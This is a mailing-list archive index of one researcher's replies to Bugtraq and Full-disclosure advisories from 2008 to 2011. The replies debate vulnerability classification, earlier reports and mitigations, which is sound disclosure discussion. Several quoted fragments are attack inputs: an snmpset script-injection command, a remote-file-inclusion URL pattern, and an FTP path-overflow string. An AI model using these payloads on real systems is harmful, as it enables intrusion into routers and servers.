Re: [DSECRG-11-018] Kaspersky administration Kit - Remote code execution via SMBRelay

2011-04-26 Thread Vladimir '3APA3A'; Dubrovin
Dear Alexandr Polyakov, AFAIK, SMB NTLM relaying was closed with MS08-068 and Kerberos was never possible to relay. Are you sure authentication is really possible with patched windows systems? --Monday, April 25, 2011, 12:21:57 PM, you wrote to bugtraq@securityfocus.com: AP> Digital Security

Re: Buffer overflow in libtiff in Imagemagick

2011-03-23 Thread Vladimir '3APA3A'; Dubrovin
Dear zgm...@mail.ustc.edu.cn, This is stack overflow (stack memory exhaustion), most probably because of recursion. This is not buffer overflow (stack overrun). --Monday, March 21, 2011, 10:11:17 AM, you wrote to bugtraq@securityfocus.com: zmuec> ==1812== Access not within mapped region at ad

Re[4]: DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers

2010-05-31 Thread Vladimir '3APA3A'; Dubrovin
27;hello world'); JS> JS> Done! JS> Workaround: JS> None very intuitive. Maybe allow the user to terminate the script at every JS> iteration? specific time period? etc... JS> -- JS> From: "Vladimir '3APA3A&#x

Re[2]: DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers

2010-05-28 Thread Vladimir '3APA3A'; Dubrovin
Dear John Smith, Actually, browser DoS may be quite serious vulnerability, depending on nature of DoS. Think about e.g. banner or content exchange network, social networks, web boards, etc where browser vulnerability may be used against site or page because it will harm any visito

Re: Secunia Research: KDE KGet Insecure File Operation Vulnerability

2010-05-14 Thread Vladimir '3APA3A'; Dubrovin
Dear Secunia Research, SR> The vulnerability is caused by KGet downloading files without the SR> user's acknowledgment, overwriting existing files of the same name SR> when displaying a dialog box that allows a user to choose the file to SR> download out of the options offered by a metalink fil

Re: {PRL} Multiple Panda Security Products Local Privilege Escalation Vulnerability

2009-11-02 Thread Vladimir '3APA3A'; Dubrovin
Dear Protek Research Lab, I have a deja-vu. http://securityvulns.ru/Odocument175.html Same problem existed since 2006. With same reaction (total ignorance) from Panda developers. --Saturday, October 31, 2009, 5:24:38 PM, you wrote to bugtraq@securityfocus.com: PRL> ###

Re[2]: [Full-disclosure] Microsoft Internet Information Server ftpd zeroday

2009-09-02 Thread Vladimir '3APA3A'; Dubrovin
Dear Thierry Zoller, I think yes, MKDIR is required. It should be variation of S99-003/MS02-018. fuzzer should be very smart to create directory and user both oversized buffer and ../ in NLST - it makes path longer than MAX_PATH with existing directory. --Monday, August 31, 20

Re[2]: [Full-disclosure] Microsoft Internet Information Server ftpd zeroday

2009-09-02 Thread Vladimir '3APA3A'; Dubrovin
./A*/../A*/../A*/../A*/../A*/../A*/../A*/\r\n GL> At least on win2k3. Therefore, the workarounds for kb975191 on GL> microsoft.com are wrong. GL> Guido Landi GL> Vladimir '3APA3A' Dubrovin wrote: >> Dear Thierry Zoller, >> >> I think yes, MKDIR

Re: Update: [TZO-06-2009] IBM Proventia - Generic bypass (Limited disclosure - see details)

2009-07-16 Thread Vladimir '3APA3A'; Dubrovin
Thierry, I think inability of antivirus / intrusion detection to catch something that is not malware/intrusion or malware in the form unused in-the-wild is not vulnerability. Antivirus (generally) gives no preventive protection. They can add signatures for your PoCs to their database

Re: XAMPP for Windows (Xss/PHPinfo) Multiple Vulnerability

2009-07-02 Thread Vladimir '3APA3A'; Dubrovin
Dear Cru3l.b0y, And this "new bug" was reported 4 years ago by Donnie Werner aka morning_wood http://securityvulns.ru/Idocument295.html XAMP latest version is 1.7.1. trolling? --Tuesday, June 30, 2009, 7:21:52 PM, you wrote to bugtraq@securityfocus.com: Cb> Hi Dear, Cb> I found new bug

Re: SIPS v0.2.2 Remote File Inclusion Vulnerability

2009-06-30 Thread Vladimir '3APA3A'; Dubrovin
Dear Cru3l.b0y, This vulnerability was reported by the.leo.008_(at)_gmail.com 3 years ago: http://securityvulns.com/Odocument224.html --Tuesday, June 30, 2009, 7:20:48 PM, you wrote to bugtraq@securityfocus.com: Cb> Hi Dear, Cb> Please publish this bug. Cb> Thank you -- Skype: Vladimir.Du

Re[2]: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-16 Thread Vladimir '3APA3A'; Dubrovin
Dear Tom Neaves, It still can be exploited from Internet even if "remote management" is only accessible from local network. If you can trick user to visit Web page, you can place a form on this page which targets to router and request to router is issued from victim's browser. --Tuesday

Re[2]: Addendum : [TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG)

2009-05-27 Thread Vladimir '3APA3A'; Dubrovin
Dear Jim Parkhurst, It may depend on video card and video drivers and/or amount of memory/video memory. 9 years ago there was vulnerability in Internet explorer with displaying scaled image: http://securityvulns.com/advisories/ie5freeze.asp results

Re: Windows Update (re-)installs outdated Flash ActiveX on Windows XP

2009-04-22 Thread Vladimir '3APA3A'; Dubrovin
Dear Stefan Kanthak, As far as I can see, Internet Explorer actually uses flash10b.ocx. Adobe Flash Player 10.0 r22 --Monday, April 20, 2009, 8:17:24 PM, you wrote to bugtraq@securityfocus.com: SK> Windows Update (as well as Microsoft Update and the Automatic Update) SK> installs an outdated (an

Re[2]: Secunia Research: Adobe Reader JBIG2 Symbol Dictionary Buffer Overflow

2009-03-25 Thread Vladimir '3APA3A'; Dubrovin
Dear Eric C. Lukens, US-CERT note TA09-051A on this issue beeing exploited in-the-wild was issued on February, 20. http://www.us-cert.gov/cas/techalerts/TA09-051A.html --Wednesday, March 25, 2009, 10:20:40 PM, you wrote to bugtraq@securityfocus.com: ECL> I noticed that as well, but suspecte

Re: iDefense COMRaider, ActiveX controls, and browser configuration

2009-03-06 Thread Vladimir '3APA3A'; Dubrovin
Dear Steven M. Christey, --Thursday, March 5, 2009, 9:41:00 PM, you wrote to bugtraq@securityfocus.com: SMC> Note that a Google search for phrases like "Initialize and script ActiveX SMC> controls not marked as safe for scripting" with "Enable" will return an SMC> unsettling number of documents

Re[2]: [DSECRG-09-009] APC PowerChute Network Shutdown's Web Interface - XSS vulnerability

2009-02-27 Thread Vladimir '3APA3A'; Dubrovin
Dear Ansgar Wiechers, --Friday, February 27, 2009, 12:15:50 AM, you wrote to bugtraq@securityfocus.com: >> >> Just wonder: how can firewall to protect against XSS/response splitting? AW> You don't give the bad guys access to your UPS's web interface? In case of non-persistant XSS, form redi

Re: [DSECRG-09-009] APC PowerChute Network Shutdown's Web Interface - XSS vulnerability

2009-02-26 Thread Vladimir '3APA3A'; Dubrovin
Dear Digital Security Research Group, --Thursday, February 26, 2009, 7:40:50 PM, you wrote to bugtraq@securityfocus.com: DSRG> Application:APC PowerChute Network Shutdown's Web Interface DSRG> Vendor URL: http://www.apc.com/ DSRG> Bug:

Re[2]: Internet explorer 7.0 stack overflow

2009-01-30 Thread Vladimir '3APA3A'; Dubrovin
Dear jplop...@gmail.com, Stack exhaustion and stack overflow are 2 names for same thing. stack _buffer_ overflow aka stack overrun - is different thing. --Thursday, January 29, 2009, 6:31:05 PM, you wrote to bugtraq@securityfocus.com: jgc> According to MS, is stack exhaustion and not overflow

Re[2]: Multiple XSRF in DD-WRT (Remote Root Command Execution)

2008-12-11 Thread Vladimir '3APA3A'; Dubrovin
Dear [EMAIL PROTECTED], According to current practices, it's considered as a security vulnerability. The fact you must be logged in to device in browser is a mitigation factor. To protect routers against attacks like this either generate some kind of non-predictable session id

Re: DoS attacks on MIME-capable software via complex MIME emails

2008-12-09 Thread Vladimir '3APA3A'; Dubrovin
Dear [EMAIL PROTECTED], Idea is not new. Same vulnerabilit was reported for Agnitum Outpost by Alexander Andrusenko in 2004, http://securityvulns.com/news3687.html Also, same vulnerabilities were reported and fixed in Sendmail (CVE-2006-1173). --Tuesday, December 9, 2008, 1:52:17 AM,

Re: iDefense Security Advisory 10.30.08: Adobe PageMaker Key Strings Stack Buffer Overflow

2008-11-03 Thread Vladimir '3APA3A'; Dubrovin
Dear iDefense Labs, --Thursday, October 30, 2008, 11:24:35 PM, you wrote to bugtraq@securityfocus.com: iL> VII. CVE INFORMATION iL> The Common Vulnerabilities and Exposures (CVE) project has assigned the iL> name CVE-2008-6432 to this issue. This is a candidate for inclusion in iL> the CVE l

Re[2]: PR08-24: Proxim Tsunami MP.11 2411 vulnerable to SNMP Injection

2008-10-10 Thread Vladimir '3APA3A'; Dubrovin
or Orinoco these settings are read/write: http://support.ipmonitor.com/mibs/ORINOCO-MIB/oids.aspx see e.g. oriDHCPServerPrimaryDNSIPAddress --Friday, October 10, 2008, 1:24:27 AM, you wrote to [EMAIL PROTECTED]: lercg> -----"Vladimir '3APA3A' Dubrovin" <[EMAIL PROTEC

Re: PR08-24: Proxim Tsunami MP.11 2411 vulnerable to SNMP Injection

2008-10-09 Thread Vladimir &#x27;3APA3A'; Dubrovin
Dear ProCheckUp Research, What can you achieve with script injection you can not achieve with SNMP write access? --Thursday, October 9, 2008, 5:02:44 PM, you wrote to bugtraq@securityfocus.com: PR> $ snmpset -v1 -c public 192.168.1.100 sysName.0 s '">>alert(1)' -- ~/ZARAZA http://securi

Re: AyeView v2.20 (malformed gif image) DoS Exploit

2008-10-06 Thread Vladimir &#x27;3APA3A'; Dubrovin
Dear [EMAIL PROTECTED], --Saturday, October 4, 2008, 11:49:42 PM, you wrote to bugtraq@securityfocus.com: clgc> Name : AyeView v2.20 (malformed gif image) DoS Exploit DoS vulnerability in computer security is blocking legitimate access to some data or service. What kind of service

Re: White Wolf Labs #080922-1: Exploitation Through ActiveSync 4.x

2008-10-02 Thread Vladimir &#x27;3APA3A'; Dubrovin
Dear Seth Fogie, In a same way you can plug an USB Ethernet network adapter with notebook attached. No active sync required at all. This is a question of physical security. --Tuesday, September 30, 2008, 6:08:05 PM, you wrote to bugtraq@securityfocus.com: SF> White Wolf Labs #08092

Re: Sagem Router [EMAIL PROTECTED] 2404 Remote Denial Of Service Exploit

2008-09-09 Thread Vladimir &#x27;3APA3A'; Dubrovin
Dear [EMAIL PROTECTED], That's nice, but don't you think admin:admin user can do much better things by e.g. changing router's firmware? --Monday, September 8, 2008, 5:35:51 PM, you wrote to bugtraq@securityfocus.com: zun> curl -u admin:admin -- ~/ZARAZA http://securityvulns.com/ Впрочем,

Re: IdeBox (include) Remote File Inclusion Vulnerability

2008-06-25 Thread Vladimir &#x27;3APA3A'; Dubrovin
Dear Ghost hacker, Old. Was reported by Kacper in 2006 http://securityvulns.ru/Ndocument286.html --Wednesday, June 25, 2008, 4:17:38 PM, you wrote to bugtraq@securityfocus.com: Gh> Exploit : Gh> http:///[Path]/include.php?gorumDir=[EVIL] -- ~/ZARAZA http://securityvulns.com/ Таким